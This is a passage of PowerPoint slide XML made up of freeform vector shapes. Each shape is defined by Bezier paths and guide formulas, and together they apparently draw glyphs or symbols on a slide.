                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F3AEB7D-E249-4B5E-9982-F4B0AE463C25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499100" y="4051300"/>
              <a:ext cx="96838" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99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9 w 212"/>
                <a:gd name="T9" fmla="*/ 61 h 279"/>
                <a:gd name="T10" fmla="*/ 99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5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2 h 279"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 248 h 279"/>
                <a:gd name="T38" fmla="*/ 99 w 212"/>
                <a:gd name="T39" fmla="*/ 210 h 279"/>
                <a:gd name="T40" fmla="*/ 99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9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2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="243"/>
                    <a:pt x="149" y="248"/>
                    <a:pt x="137" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="248"/>
                    <a:pt x="99" y="222"/>
                    <a:pt x="99" y="210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99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9" name="Freeform 884">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6748EA7-1321-40D2-96A1-DC88EDEDF99B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654675" y="4151313"/>
              <a:ext cx="38100" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 51 w 83"/>
                <a:gd name="T1" fmla="*/ 61 h 132"/>
                <a:gd name="T2" fmla="*/ 14 w 83"/>
                <a:gd name="T3" fmla="*/ 102 h 132"/>
                <a:gd name="T4" fmla="*/ 0 w 83"/>
                <a:gd name="T5" fmla="*/ 116 h 132"/>
                <a:gd name="T6" fmla="*/ 16 w 83"/>
                <a:gd name="T7" fmla="*/ 132 h 132"/>
                <a:gd name="T8" fmla="*/ 83 w 83"/>
                <a:gd name="T9" fmla="*/ 50 h 132"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 132"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31 h 132"/>
                <a:gd name="T14" fmla="*/ 41 w 83"/>
                <a:gd name="T15" fmla="*/ 63 h 132"/>
                <a:gd name="T16" fmla="*/ 51 w 83"/>
                <a:gd name="T17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51" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="92"/>
                    <a:pt x="20" y="100"/>
                    <a:pt x="14" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="104"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="124"/>
                    <a:pt x="8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  <a:cubicBezTo>
                    <a:pt x="83" y="20"/>
                    <a:pt x="64" y="0"/>
                    <a:pt x="42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44" y="63"/>
                    <a:pt x="48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0" name="Freeform 885">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A936950-3DE4-4B3E-A593-A90103666377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900738" y="4151313"/>
              <a:ext cx="28575" cy="28575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63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3" y="47"/>
                    <a:pt x="63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1" name="Freeform 886">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BCF040-C046-43D4-A956-B530219F1D4E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019800" y="4151313"/>
              <a:ext cx="28575" cy="28575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62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62" y="32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2" y="47"/>
                    <a:pt x="62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2" name="Freeform 887">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55D144E-B575-420B-87CD-1CF203C1EF30}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6140450" y="4151313"/>
              <a:ext cx="28575" cy="28575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 63 w 63"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 32 w 63"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 63"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 63"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 63 w 63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3" y="47"/>
                    <a:pt x="63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3" name="Freeform 888">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7979E4A-6880-4DAA-8431-42E9690682DA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6235700" y="4017963"/>
              <a:ext cx="60325" cy="180975"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 132 w 132"/>
                <a:gd name="T1" fmla="*/ 193 h 387"/>
                <a:gd name="T2" fmla="*/ 91 w 132"/>
                <a:gd name="T3" fmla="*/ 64 h 387"/>
                <a:gd name="T4" fmla="*/ 16 w 132"/>
                <a:gd name="T5" fmla="*/ 0 h 387"/>
                <a:gd name="T6" fmla="*/ 0 w 132"/>
                <a:gd name="T7" fmla="*/ 14 h 387"/>
                <a:gd name="T8" fmla="*/ 8 w 132"/>
                <a:gd name="T9" fmla="*/ 26 h 387"/>
                <a:gd name="T10" fmla="*/ 97 w 132"/>
                <a:gd name="T11" fmla="*/ 193 h 387"/>
                <a:gd name="T12" fmla="*/ 12 w 132"/>
                <a:gd name="T13" fmla="*/ 358 h 387"/>
                <a:gd name="T14" fmla="*/ 0 w 132"/>
                <a:gd name="T15" fmla="*/ 373 h 387"/>
                <a:gd name="T16" fmla="*/ 16 w 132"/>
                <a:gd name="T17" fmla="*/ 387 h 387"/>
                <a:gd name="T18" fmla="*/ 132 w 132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3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6" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="81"/>
                    <a:pt x="97" y="161"/>
                    <a:pt x="97" y="193"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="243"/>
                    <a:pt x="79" y="312"/>
                    <a:pt x="12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6" y="387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="387"/>
                    <a:pt x="132" y="321"/>
                    <a:pt x="13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4" name="Freeform 889">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E05E642-028E-4765-8C7F-04C59BAAA399}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId176"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6376988" y="4079875"/>
              <a:ext cx="33338" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 72 w 74"/>
                <a:gd name="T1" fmla="*/ 31 h 284"/>
                <a:gd name="T2" fmla="*/ 41 w 74"/>
                <a:gd name="T3" fmla="*/ 0 h 284"/>
                <a:gd name="T4" fmla="*/ 9 w 74"/>
                <a:gd name="T5" fmla="*/ 31 h 284"/>
                <a:gd name="T6" fmla="*/ 40 w 74"/>
                <a:gd name="T7" fmla="*/ 62 h 284"/>
                <a:gd name="T8" fmla="*/ 72 w 74"/>
                <a:gd name="T9" fmla="*/ 31 h 284"/>
                <a:gd name="T10" fmla="*/ 42 w 74"/>
                <a:gd name="T11" fmla="*/ 215 h 284"/>
                <a:gd name="T12" fmla="*/ 9 w 74"/>
                <a:gd name="T13" fmla="*/ 255 h 284"/>
                <a:gd name="T14" fmla="*/ 0 w 74"/>
                <a:gd name="T15" fmla="*/ 268 h 284"/>
                <a:gd name="T16" fmla="*/ 15 w 74"/>
                <a:gd name="T17" fmla="*/ 284 h 284"/>
                <a:gd name="T18" fmla="*/ 74 w 74"/>
                <a:gd name="T19" fmla="*/ 201 h 284"/>
                <a:gd name="T20" fmla="*/ 40 w 74"/>
                <a:gd name="T21" fmla="*/ 152 h 284"/>
                <a:gd name="T22" fmla="*/ 9 w 74"/>
                <a:gd name="T23" fmla="*/ 183 h 284"/>
                <a:gd name="T24" fmla="*/ 42 w 74"/>
                <a:gd name="T25" fmla="*/ 21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84">
                  <a:moveTo>
                    <a:pt x="72" y="31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9" y="15"/>
                    <a:pt x="9" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="49"/>
                    <a:pt x="24" y="62"/>
                    <a:pt x="40" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="62"/>
                    <a:pt x="72" y="47"/>
                    <a:pt x="72" y="31"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="42" y="215"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="242"/>
                    <a:pt x="17" y="251"/>
                    <a:pt x="9" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="257"/>
                    <a:pt x="0" y="260"/>
                    <a:pt x="0" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="276"/>
                    <a:pt x="7" y="284"/>
                    <a:pt x="15" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="284"/>
                    <a:pt x="74" y="257"/>
                    <a:pt x="74" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="168"/>
                    <a:pt x="59" y="152"/>
                    <a:pt x="40" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="152"/>
                    <a:pt x="9" y="166"/>
                    <a:pt x="9" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="197"/>
                    <a:pt x="18" y="215"/>
                    <a:pt x="42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5" name="Freeform 890">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38B02606-D4ED-4536-BC5B-037EEC5169B3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704850" y="4318000"/>
              <a:ext cx="87313" cy="142875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1 h 306"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 167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6"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106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67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6" name="Freeform 891">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC59F162-0164-497F-9FE9-81261709AAE2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809625" y="4359275"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26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19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19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7 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 71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6" y="187"/>
                    <a:pt x="228" y="187"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="206" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206" y="71"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="206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7" name="Freeform 892">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{754F81EF-2F09-4599-A1DB-584464EA3084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933450" y="4330700"/>
              <a:ext cx="96838" cy="1317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199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3 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 63 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 19 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 63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3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199" y="92"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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1"/>
                    <a:pt x="63" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63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19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3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8" name="Freeform 893">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0628611B-F948-4D8B-BD18-6DA25CC03E33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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1184275" y="4357688"/>
              <a:ext cx="88900" cy="104775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9" name="Freeform 894">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B44A94-E444-4F86-B5C5-28A4E3774C04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1290638" y="4359275"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26 h 218"/>
                <a:gd name="T2" fmla="*/ 56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8 w 249"/>
                <a:gd name="T47" fmla="*/ 187 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 249"/>
                <a:gd name="T49" fmla="*/ 187 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 249"/>
                <a:gd name="T51" fmla="*/ 71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6" y="187"/>
                    <a:pt x="228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0" name="Freeform 895">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC543841-C4AB-4FE6-9411-0CF5FDF08280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1411288" y="4359275"/>
              <a:ext cx="107950" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 86 h 328"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 328"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 328"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 190 h 328"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 122 h 328"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 86 h 328"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 195 h 328"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 328"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 328"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 328"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 24 h 328"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 328"/>
                <a:gd name="T24" fmla="*/ 21 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 328"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 18 h 328"/>
                <a:gd name="T28" fmla="*/ 20 w 237"/>
                <a:gd name="T29" fmla="*/ 33 h 328"/>
                <a:gd name="T30" fmla="*/ 43 w 237"/>
                <a:gd name="T31" fmla="*/ 33 h 328"/>
                <a:gd name="T32" fmla="*/ 43 w 237"/>
                <a:gd name="T33" fmla="*/ 298 h 328"/>
                <a:gd name="T34" fmla="*/ 21 w 237"/>
                <a:gd name="T35" fmla="*/ 298 h 328"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 313 h 328"/>
                <a:gd name="T38" fmla="*/ 20 w 237"/>
                <a:gd name="T39" fmla="*/ 328 h 328"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 328 h 328"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 313 h 328"/>
                <a:gd name="T44" fmla="*/ 99 w 237"/>
                <a:gd name="T45" fmla="*/ 298 h 328"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 328"/>
                <a:gd name="T48" fmla="*/ 77 w 237"/>
                <a:gd name="T49" fmla="*/ 19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8">
                  <a:moveTo>
                    <a:pt x="77" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="56"/>
                    <a:pt x="106" y="30"/>
                    <a:pt x="137" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="30"/>
                    <a:pt x="203" y="66"/>
                    <a:pt x="203" y="110"/>
                  </a:cubicBez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7" y="146"/>
                    <a:pt x="77" y="122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7" y="216"/>
                    <a:pt x="119" y="221"/>
                    <a:pt x="135" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="221"/>
                    <a:pt x="237" y="173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3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="328"/>
                    <a:pt x="13" y="328"/>
                    <a:pt x="20" y="328"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="99" y="328"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="328"/>
                    <a:pt x="119" y="328"/>
                    <a:pt x="119" y="313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1" name="Freeform 896">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D46F3D1-CF89-4ACE-BB17-039ECD5E155F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1535113" y="4359275"/>
              <a:ext cx="104775" cy="101600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0 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 226"/>
                <a:gd name="T5" fmla="*/ 52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0 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 226"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 187 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 226"/>
                <a:gd name="T27" fmla="*/ 187 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 202 h 218"/>
                <a:gd name="T30" fmla="*/ 20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7 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 187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6" y="44"/>
                    <a:pt x="226" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226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4" y="187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2" name="Freeform 897">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D27AED-80C2-4E43-82DA-D2ADF51A135F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1666875" y="4318000"/>
              <a:ext cx="85725" cy="142875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1 h 306"/>
                <a:gd name="T4" fmla="*/ 25 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 25 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 21 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 21 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 168 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 168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6"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="25" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="25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6"/>
                    <a:pt x="13" y="306"/>
                    <a:pt x="21" y="306"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="168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3" name="Freeform 898">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D374CAC9-F89B-49C2-8063-C0D17A2ED0CF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1771650" y="4359275"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 26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1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4" name="Freeform 899">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C3B66E1-E75D-4F0C-95F9-59D8DA7C97EB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1893888" y="4330700"/>
              <a:ext cx="98425" cy="1317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4 w 211"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 211"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 20 w 211"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 211"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 211"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64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5" name="Freeform 900">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8649E935-3DBF-4CB6-B575-C4A512913E51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2019300" y="4316413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69 h 308"/>
                <a:gd name="T12" fmla="*/ 153 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 308"/>
                <a:gd name="T14" fmla="*/ 175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0 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 308"/>
                <a:gd name="T22" fmla="*/ 70 w 197"/>
                <a:gd name="T23" fmla="*/ 93 h 308"/>
                <a:gd name="T24" fmla="*/ 21 w 197"/>
                <a:gd name="T25" fmla="*/ 93 h 308"/>
                <a:gd name="T26" fmla="*/ 0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 308"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 308"/>
                <a:gd name="T30" fmla="*/ 70 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 308"/>
                <a:gd name="T32" fmla="*/ 70 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 308"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 308"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 308"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 308 h 308"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 308 h 308"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 293 h 308"/>
                <a:gd name="T44" fmla="*/ 155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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="93"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="93"/>
                    <a:pt x="0" y="93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0" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70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6" name="Freeform 901">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296FFA8D-DD51-4D25-A849-4FBCC2AAAF89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2168525" y="4297363"/>
              <a:ext cx="60325" cy="182563"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 131 w 131"/>
                <a:gd name="T1" fmla="*/ 373 h 387"/>
                <a:gd name="T2" fmla="*/ 119 w 131"/>
                <a:gd name="T3" fmla="*/ 358 h 387"/>
